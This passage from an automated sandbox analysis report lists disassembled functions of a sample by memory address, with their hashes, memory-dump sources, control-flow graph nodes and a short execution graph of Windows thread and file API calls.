                                                    • Opcode Fuzzy Hash: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
                                                    • Instruction Fuzzy Hash: 48F04230A0991D8FDFA9DB08C850FA9B7B1FB69300F1045DA800EE7250CB31AE84CF50
                                                    Function 00007FFAACD180EB Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f858af169ab237a888d6f88309ab119291cf4a778b32f561e48a95fae67d03c
                                                    • Instruction ID: 5d4cb713270def0a3b7c83da4d1709e966f26aca5ca4f0ed4ffadd1701986239
                                                    • Opcode Fuzzy Hash: 8f858af169ab237a888d6f88309ab119291cf4a778b32f561e48a95fae67d03c
                                                    • Instruction Fuzzy Hash: 43F0D030E0550ECFEB45DF54C885ABEB7F1EB55311F114536D519E3291DA38A5848B90
                                                    Function 00007FFAAC5B5A29 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction ID: 9e1bd98de13f888f31787b5d19792a40a08de280a56084d780a330a474d13598
                                                    • Opcode Fuzzy Hash: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction Fuzzy Hash: F8F0F470D4952BCAFB649B14D8447AD7BB4FB55304F1090B8E14DA32C1EA785984CF45
                                                    Function 00007FFAAC5BAE81 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dcaad1f3a572f592857fb7c2602b4963a635822b09e5c854dde152989a45e89a
                                                    • Instruction ID: ab711eb49fbcc6c53d1b1f93ebfc57f23d54a2fe2304b88ea4267b1ed72d457a
                                                    • Opcode Fuzzy Hash: dcaad1f3a572f592857fb7c2602b4963a635822b09e5c854dde152989a45e89a
                                                    • Instruction Fuzzy Hash: CDF03460D0651A8EE7A4DB18C865BADB7A1EF84240F1081B5E00DA6A92DE34AD868F80
                                                    Function 00007FFAACD108FC Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                    • Instruction ID: be5ca5ab2b20f45c513f70290660cd15a99a5e2c7e9dc46c301489736ba36c36
                                                    • Opcode Fuzzy Hash: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                    • Instruction Fuzzy Hash: 7CE0C97190895D9FEFA5EB14C890EA8BBB0EF26300F2484D9C04ED7292CA34A985CF41
                                                    Function 00007FFAACD117B8 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ae0dbc6442b226abce3de6760fdf651bdbeb5b578682436fdacea31f99563c5
                                                    • Instruction ID: e8d0910e1850eb0c61faff520f711dbe64dff1203deb0eb5ab41f34e1f17edba
                                                    • Opcode Fuzzy Hash: 6ae0dbc6442b226abce3de6760fdf651bdbeb5b578682436fdacea31f99563c5
                                                    • Instruction Fuzzy Hash: E5D0C961B1AE4B8ABED8A759047657A56C2EBA6680B8040B8A41EC3285ED28EC4942C0
                                                    Function 00007FFAACD10059 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c8daa206dd006a2abb262f56e4aa2217bf7fd07e38f966d5c5c2519e653bf8d0
                                                    • Instruction ID: 047894e5c170024af85fda0a69a0b5279bf52bd5e0969814e5aa6443347552c4
                                                    • Opcode Fuzzy Hash: c8daa206dd006a2abb262f56e4aa2217bf7fd07e38f966d5c5c2519e653bf8d0
                                                    • Instruction Fuzzy Hash: 68E06734E19A2D9FDBA4EF18C8417E9B3B1FB5A710F5040E9904DE3245CA30AE85CF81
                                                    Function 00007FFAACD00BBB Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6cc9f1cd73963b8e64c53a00d36f63db7e9bf6bb4ce46b5312eed3194358af05
                                                    • Instruction ID: cbc83d75311d1feeffbf2559043302ae54433251c3053327c740fb5d3e321d18
                                                    • Opcode Fuzzy Hash: 6cc9f1cd73963b8e64c53a00d36f63db7e9bf6bb4ce46b5312eed3194358af05
                                                    • Instruction Fuzzy Hash: 01D09210F0F547F5F6E85709402023A52A09F02304F60C43BC0BF618C18D2DF509A2E2
                                                    Function 00007FFAACD000DF Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 587af31ea369e36e3a95fe935c59aa69601c884c85df8785aa3ba9a88f9d6e6d
                                                    • Instruction ID: 389d2a4a356c3857802017b7edf864a3fd22f881dc7c3bd8ae5e34fd24d9f0ae
                                                    • Opcode Fuzzy Hash: 587af31ea369e36e3a95fe935c59aa69601c884c85df8785aa3ba9a88f9d6e6d
                                                    • Instruction Fuzzy Hash: AAC04C10F4F243FBF65157F9485113C26901F0B644B548672D11F8A1C3D85CB84863A1
                                                    Function 00007FFAAC5B36C4 Relevance: .0, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction ID: 89876fc7a8e91c23367bb8cb662a1b4e4fa8174172e1ca2e7ebb80250c676705
                                                    • Opcode Fuzzy Hash: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction Fuzzy Hash: 2AA01260CCA003C1F260171040083BC59945B02340F008074A00C15183ED3850080A41

                                                    Non-executed Functions

                                                    Function 00007FFAAC5B09B0 Relevance: 5.2, Strings: 4, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: e24436b532d40fb043871d2fa7224a15da0472b67d15e9fba48e30216dfb5661
                                                    • Instruction ID: 0752e40061ad8a8e6ce196779b8218dacecc6a9156f072efef6a3e06596d0b95
                                                    • Opcode Fuzzy Hash: e24436b532d40fb043871d2fa7224a15da0472b67d15e9fba48e30216dfb5661
                                                    • Instruction Fuzzy Hash: 7751E8A7E4E46B46E10137FDB4219FD6B84DF8A339B08C777E04EC96E36D28608582D5

                                                    Execution Graph

                                                    Execution Coverage:5.1%
                                                    Dynamic/Decrypted Code Coverage:75%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:12
                                                    Total number of Limit Nodes:0
                                                    execution_graph 22074 7ffaac8001a9 22075 7ffaac8001b7 CloseHandle 22074->22075 22077 7ffaac800294 22075->22077 22078 7ffaac801e35 22079 7ffaac801e4f GetFileAttributesW 22078->22079 22081 7ffaac801f15 22079->22081 22066 7ffaac800040 22067 7ffaac80007b ResumeThread 22066->22067 22069 7ffaac800154 22067->22069 22070 7ffaac7fe84d 22071 7ffaac7fe85b SuspendThread 22070->22071 22073 7ffaac7fe934 22071->22073

                                                    Executed Functions

                                                    Function 00007FFAACDA194F Relevance: 5.7, Strings: 4, Instructions: 735COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ffaacda194f-7ffaacda1962 1 7ffaacda1964-7ffaacda1ca5 0->1 2 7ffaacda19ae-7ffaacda19c4 0->2 8 7ffaacda1caf-7ffaacda1cee 1->8 4 7ffaacda1a54-7ffaacda1a84 2->4 5 7ffaacda19ca-7ffaacda19d2 2->5 16 7ffaacda1a8a-7ffaacda1a8b 4->16 17 7ffaacda1b2e-7ffaacda1b37 4->17 7 7ffaacda19d8-7ffaacda19ea 5->7 5->8 7->8 9 7ffaacda19f0-7ffaacda1a07 7->9 20 7ffaacda1cf0 8->20 10 7ffaacda1a47-7ffaacda1a4e 9->10 11 7ffaacda1a09-7ffaacda1a10 9->11 10->4 10->5 11->8 14 7ffaacda1a16-7ffaacda1a44 11->14 14->10 21 7ffaacda1a8e-7ffaacda1aa4 16->21 18 7ffaacda1b3d-7ffaacda1b43 17->18 19 7ffaacda1c6f-7ffaacda1c7d 17->19 18->8 22 7ffaacda1b49-7ffaacda1b58 18->22 24 7ffaacda1c84-7ffaacda1c95 19->24 25 7ffaacda1c7f 19->25 30 7ffaacda1cfb-7ffaacda1d91 20->30 21->8 23 7ffaacda1aaa-7ffaacda1ace 21->23 26 7ffaacda1c62-7ffaacda1c69 22->26 27 7ffaacda1b5e-7ffaacda1b65 22->27 28 7ffaacda1b21-7ffaacda1b28 23->28 29 7ffaacda1ad0-7ffaacda1af3 23->29 25->24 26->18 26->19 27->8 32 7ffaacda1b6b-7ffaacda1b75 27->32 28->17 28->21 29->8 38 7ffaacda1af9-7ffaacda1b1f 29->38 35 7ffaacda1d16-7ffaacda1d96 30->35 36 7ffaacda1d9c-7ffaacda1ddf 30->36 37 7ffaacda1b7c-7ffaacda1b87 32->37 35->36 46 7ffaacda1d38-7ffaacda1d98 35->46 49 7ffaacda1de1-7ffaacda1e36 36->49 40 7ffaacda1bc6-7ffaacda1bd5 37->40 41 7ffaacda1b89-7ffaacda1ba0 37->41 38->28 38->29 40->8 42 7ffaacda1bdb-7ffaacda1bff 40->42 41->8 43 7ffaacda1ba6-7ffaacda1bc2 41->43 47 7ffaacda1c02-7ffaacda1c1f 42->47 43->41 48 7ffaacda1bc4 43->48 46->36 57 7ffaacda1d5c-7ffaacda1d9a 46->57 47->8 52 7ffaacda1c25-7ffaacda1c40 47->52 53 7ffaacda1c42-7ffaacda1c58 48->53 63 7ffaacda1e41-7ffaacda1ee7 49->63 52->47 52->53 53->8 55 7ffaacda1c5a-7ffaacda1c5e 53->55 55->26 57->36 62 7ffaacda1d7d-7ffaacda1d90 57->62 75 7ffaacda2017-7ffaacda2034 63->75 76 7ffaacda1eed-7ffaacda2290 63->76 78 7ffaacda203a-7ffaacda203f 75->78 79 7ffaacda2341-7ffaacda23a8 75->79 80 7ffaacda2042-7ffaacda2049 78->80 85 7ffaacda2518 79->85 81 7ffaacda204b-7ffaacda204f 80->81 82 7ffaacda1fcc-7ffaacda2339 80->82 81->49 84 7ffaacda2055 81->84 82->79 87 7ffaacda20d3-7ffaacda20d6 84->87 85->85 88 7ffaacda20d9-7ffaacda20e0 87->88 89 7ffaacda2057-7ffaacda208c call 7ffaacda1ce0 88->89 90 7ffaacda20e6 88->90 89->79 96 7ffaacda2092-7ffaacda20a2 89->96 92 7ffaacda2156-7ffaacda215d 90->92 94 7ffaacda20e8-7ffaacda211a call 7ffaacda1ce0 92->94 95 7ffaacda215f-7ffaacda21a5 92->95 94->79 103 7ffaacda2120-7ffaacda2148 94->103 109 7ffaacda1f74-7ffaacda1f78 95->109 110 7ffaacda21ab-7ffaacda21b0 95->110 96->49 99 7ffaacda20a8-7ffaacda20c5 96->99 99->79 101 7ffaacda20cb-7ffaacda20d0 99->101 101->87 103->79 104 7ffaacda214e-7ffaacda2153 103->104 104->92 112 7ffaacda1fca 109->112 113 7ffaacda1f7a-7ffaacda2318 109->113 111 7ffaacda2236-7ffaacda223a 110->111 114 7ffaacda21b5-7ffaacda21e4 call 7ffaacda1ce0 111->114 115 7ffaacda2240-7ffaacda2246 111->115 112->80 114->79 119 7ffaacda21ea-7ffaacda21fa 114->119 119->63 120 7ffaacda2200-7ffaacda220f 119->120 120->79 121 7ffaacda2215-7ffaacda2228 120->121 121->88 122 7ffaacda222e-7ffaacda2233 121->122 122->111
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: b4S$r6S$r6S$r6S
                                                    • API String ID: 0-2602100741
                                                    • Opcode ID: 33398464337195630ef3e3cef2f2c76e748ac04adbb98fcaf4a45693ddb9468b
                                                    • Instruction ID: c9fed6c94fca88f73f26293c6ab62ab63b282118b990f64c520ec6701539976d
                                                    • Opcode Fuzzy Hash: 33398464337195630ef3e3cef2f2c76e748ac04adbb98fcaf4a45693ddb9468b
                                                    • Instruction Fuzzy Hash: 27529F70A19649CFEB5DCF18C4906B977A1FF4A300F5085BDD45ECB286DA38E985CB81
                                                    Function 00007FFAAC650D68 Relevance: 5.3, Strings: 4, Instructions: 278COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 172 7ffaac650d68-7ffaac650d7f 173 7ffaac650d81 172->173 174 7ffaac650d82-7ffaac650db9 172->174 173->174 176 7ffaac650dc0-7ffaac650ebe call 7ffaac6507d8 174->176 177 7ffaac650dbb 174->177 193 7ffaac650ec0-7ffaac650f2e 176->193 194 7ffaac650f35-7ffaac650fa3 176->194 177->176 193->194 204 7ffaac650fab-7ffaac65109c 194->204
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "9S$b4S$r6S$r6S
                                                    • API String ID: 0-592790241
                                                    • Opcode ID: 356716e6aa7f6ddece2c2816ce6278dab41e54536c0932986be2fb9e194122ff
                                                    • Instruction ID: 90e74c479996b50de4bdcc564c95bbf4a2cd55799c6b71b5853043cdd000c5eb
                                                    • Opcode Fuzzy Hash: 356716e6aa7f6ddece2c2816ce6278dab41e54536c0932986be2fb9e194122ff
                                                    • Instruction Fuzzy Hash: AAA1F4B2908A8D8FE789DB6CC8557AABFE1FB5A310F5041BED04DD72D2CA795805C780
                                                    Function 00007FFAACDA9B4A Relevance: .7, Instructions: 700COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 46ca166f079a9a79aaeae24652216e5fc6552356fd6211503bc927dfc407953c
                                                    • Instruction ID: 7842b96dd7d3bff15ab46a01eb0cdff8d92acbec629b826c8af9b52d54470f3d
                                                    • Opcode Fuzzy Hash: 46ca166f079a9a79aaeae24652216e5fc6552356fd6211503bc927dfc407953c
                                                    • Instruction Fuzzy Hash: 3B323F70A19A8D8FEBB8EF28C855BE937E1FB59301F00416AD84EC7691DF749584CB81
                                                    Function 00007FFAACDAAFA2 Relevance: .7, Instructions: 679COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44fc1109d0b6fc683c0fb902d8ce8843e3bf4aa6ee59698d0976bca7ea81ecd5
                                                    • Instruction ID: d68154014149052725eb04a22faf73c54416dec220e145c5edc272b69930442b
                                                    • Opcode Fuzzy Hash: 44fc1109d0b6fc683c0fb902d8ce8843e3bf4aa6ee59698d0976bca7ea81ecd5
                                                    • Instruction Fuzzy Hash: A5324C70919A8D8FEBB8EF28C855BE937E1FB59301F40412AD84ECB2A1DF749545CB81
                                                    Function 00007FFAAC68F9C0 Relevance: 5.3, Strings: 4, Instructions: 309COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC685000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC685000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac685000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )J_H$XV$p[U$r6S
                                                    • API String ID: 0-4058811649
                                                    • Opcode ID: 6342bbd1479a6ec692d31d47f0b136b007d68217687ca51887770163fefd62b2
                                                    • Instruction ID: e40a6617736cefbc09237484fcca1c2ac8d620a5950198897e9b9426b1da9160
                                                    • Opcode Fuzzy Hash: 6342bbd1479a6ec692d31d47f0b136b007d68217687ca51887770163fefd62b2
                                                    • Instruction Fuzzy Hash: 2EC1DA74A04A1DCFEB98EF68C895BA9B7F1FF59300F5095A9D00DE7291CB34A985CB40
                                                    Function 00007FFAACDA1202 Relevance: 4.1, Strings: 3, Instructions: 328COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 211 7ffaacda1202-7ffaacda1209 212 7ffaacda1425-7ffaacda1436 211->212 213 7ffaacda120f-7ffaacda1241 call 7ffaacda0fa0 call 7ffaacda0e70 211->213 214 7ffaacda1438 212->214 215 7ffaacda143d-7ffaacda1448 212->215 213->212 220 7ffaacda1247-7ffaacda1299 call 7ffaacda0fa0 call 7ffaacda0e70 213->220 214->215 220->212 227 7ffaacda129f-7ffaacda12e4 call 7ffaacda0fa0 220->227 233 7ffaacda1354-7ffaacda1390 227->233 234 7ffaacda12e6-7ffaacda12fa call 7ffaacda0e70 227->234 243 7ffaacda13c9-7ffaacda13ce 233->243 234->212 239 7ffaacda1300-7ffaacda1323 call 7ffaacda0fa0 234->239 244 7ffaacda14f5-7ffaacda150c 239->244 245 7ffaacda1329-7ffaacda1339 239->245 248 7ffaacda13d5-7ffaacda13da 243->248 249 7ffaacda150f-7ffaacda151d 244->249 250 7ffaacda150e 244->250 245->244 246 7ffaacda133f-7ffaacda1352 245->246 246->233 246->234 251 7ffaacda1392-7ffaacda13b2 248->251 252 7ffaacda13dc-7ffaacda13de 248->252 254 7ffaacda1525 249->254 255 7ffaacda151f 249->255 250->249 251->244 253 7ffaacda13b8-7ffaacda13c3 251->253 252->212 256 7ffaacda13e0-7ffaacda13e3 252->256 253->243 257 7ffaacda14ab-7ffaacda14bf 253->257 258 7ffaacda1527 254->258 259 7ffaacda1529-7ffaacda1568 254->259 255->254 260 7ffaacda13e5 256->260 261 7ffaacda13e9-7ffaacda1404 256->261 262 7ffaacda14c6-7ffaacda14d1 257->262 263 7ffaacda14c1 257->263 258->259 265 7ffaacda1569 258->265 259->265 267 7ffaacda156a-7ffaacda17aa 259->267 260->261 261->244 264 7ffaacda140a-7ffaacda1423 call 7ffaacda0e70 261->264 263->262 264->212 271 7ffaacda1449-7ffaacda1462 call 7ffaacda0fa0 264->271 265->267 271->244 275 7ffaacda1468-7ffaacda146f 271->275 276 7ffaacda1499-7ffaacda14a1 275->276 277 7ffaacda14a3-7ffaacda14a9 276->277 278 7ffaacda1471-7ffaacda148d 276->278 277->257 280 7ffaacda14d2 277->280 278->244 279 7ffaacda148f-7ffaacda1497 278->279 279->276 280->244
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6S$r6S$r6S
                                                    • API String ID: 0-408531346
                                                    • Opcode ID: fcd077d99dac1b4783cdd8a4e069267822058623771b303620d0fe264d215f27
                                                    • Instruction ID: e24ebc2fa4098d7e3cda9d33c10238cadb3559a63ce0586e53f00c101a241e2b
                                                    • Opcode Fuzzy Hash: fcd077d99dac1b4783cdd8a4e069267822058623771b303620d0fe264d215f27
                                                    • Instruction Fuzzy Hash: 88C19D70A0AA46CFE749DB28C0916A4BBA1FF4A710F54817DD45FC7A86CB28F855CBC1
                                                    Function 00007FFAACDA1CE0 Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 281 7ffaacda1ce0-7ffaacda1cee 282 7ffaacda1cf0 281->282 283 7ffaacda1cfb-7ffaacda1d91 282->283 286 7ffaacda1d16-7ffaacda1d96 283->286 287 7ffaacda1d9c-7ffaacda1ddf 283->287 286->287 291 7ffaacda1d38-7ffaacda1d98 286->291 292 7ffaacda1de1-7ffaacda1e36 287->292 291->287 297 7ffaacda1d5c-7ffaacda1d9a 291->297 303 7ffaacda1e41-7ffaacda1ee7 292->303 297->287 302 7ffaacda1d7d-7ffaacda1d90 297->302 315 7ffaacda2017-7ffaacda2034 303->315 316 7ffaacda1eed-7ffaacda2290 303->316 318 7ffaacda203a-7ffaacda203f 315->318 319 7ffaacda2341-7ffaacda23a8 315->319 320 7ffaacda2042-7ffaacda2049 318->320 325 7ffaacda2518 319->325 321 7ffaacda204b-7ffaacda204f 320->321 322 7ffaacda1fcc-7ffaacda2339 320->322 321->292 324 7ffaacda2055 321->324 322->319 327 7ffaacda20d3-7ffaacda20d6 324->327 325->325 328 7ffaacda20d9-7ffaacda20e0 327->328 329 7ffaacda2057-7ffaacda208c call 7ffaacda1ce0 328->329 330 7ffaacda20e6 328->330 329->319 336 7ffaacda2092-7ffaacda20a2 329->336 332 7ffaacda2156-7ffaacda215d 330->332 334 7ffaacda20e8-7ffaacda211a call 7ffaacda1ce0 332->334 335 7ffaacda215f-7ffaacda21a5 332->335 334->319 343 7ffaacda2120-7ffaacda2148 334->343 349 7ffaacda1f74-7ffaacda1f78 335->349 350 7ffaacda21ab-7ffaacda21b0 335->350 336->292 339 7ffaacda20a8-7ffaacda20c5 336->339 339->319 341 7ffaacda20cb-7ffaacda20d0 339->341 341->327 343->319 344 7ffaacda214e-7ffaacda2153 343->344 344->332 352 7ffaacda1fca 349->352 353 7ffaacda1f7a-7ffaacda2318 349->353 351 7ffaacda2236-7ffaacda223a 350->351 354 7ffaacda21b5-7ffaacda21e4 call 7ffaacda1ce0 351->354 355 7ffaacda2240-7ffaacda2246 351->355 352->320 354->319 359 7ffaacda21ea-7ffaacda21fa 354->359 359->303 360 7ffaacda2200-7ffaacda220f 359->360 360->319 361 7ffaacda2215-7ffaacda2228 360->361 361->328 362 7ffaacda222e-7ffaacda2233 361->362 362->351
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: b4S$r6S$r6S
                                                    • API String ID: 0-515324085
                                                    • Opcode ID: bb5aec46f3d741a2a266cc1d3544234427733d5555503c4ec46a96c44eda64fd
                                                    • Instruction ID: bcc9106e7fd00268bbdfdbcbdd78ac3b225629e341f3a70eef7ae19c9df07cca
                                                    • Opcode Fuzzy Hash: bb5aec46f3d741a2a266cc1d3544234427733d5555503c4ec46a96c44eda64fd
                                                    • Instruction Fuzzy Hash: 92511471E1D65ACFFB9887288461BB87BA1FF52700F4481BDD05FC7686CD28E9888781
                                                    Function 00007FFAACDA16D8 Relevance: 2.7, Strings: 2, Instructions: 158COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 363 7ffaacda16d8-7ffaacda16f0 365 7ffaacda16f8-7ffaacda1723 363->365 369 7ffaacda174c-7ffaacda1752 365->369 370 7ffaacda1759-7ffaacda175f 369->370 371 7ffaacda1725-7ffaacda173e 370->371 372 7ffaacda1761-7ffaacda1766 370->372 373 7ffaacda1835-7ffaacda1845 371->373 374 7ffaacda1744-7ffaacda1749 371->374 375 7ffaacda1653-7ffaacda1698 372->375 376 7ffaacda176c-7ffaacda17a1 372->376 382 7ffaacda1847 373->382 383 7ffaacda1848-7ffaacda1896 373->383 374->369 375->370 380 7ffaacda169e-7ffaacda16a4 375->380 384 7ffaacda1655-7ffaacda182d 380->384 385 7ffaacda16a6 380->385 382->383 384->373 388 7ffaacda16cf-7ffaacda16d6 385->388 388->363 389 7ffaacda16a8-7ffaacda16c1 388->389 389->373 392 7ffaacda16c7-7ffaacda16cc 389->392 392->388
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $r6S
                                                    • API String ID: 0-314325997
                                                    • Opcode ID: 95f7715efd7a8e827279430829b2a302080199d105696c0aa2bce3111ac32faa
                                                    • Instruction ID: 6f22cc68b80a037e8e04dfb5f43ab64e14ac9ff551c4fb4d0f61927d466bbced
                                                    • Opcode Fuzzy Hash: 95f7715efd7a8e827279430829b2a302080199d105696c0aa2bce3111ac32faa
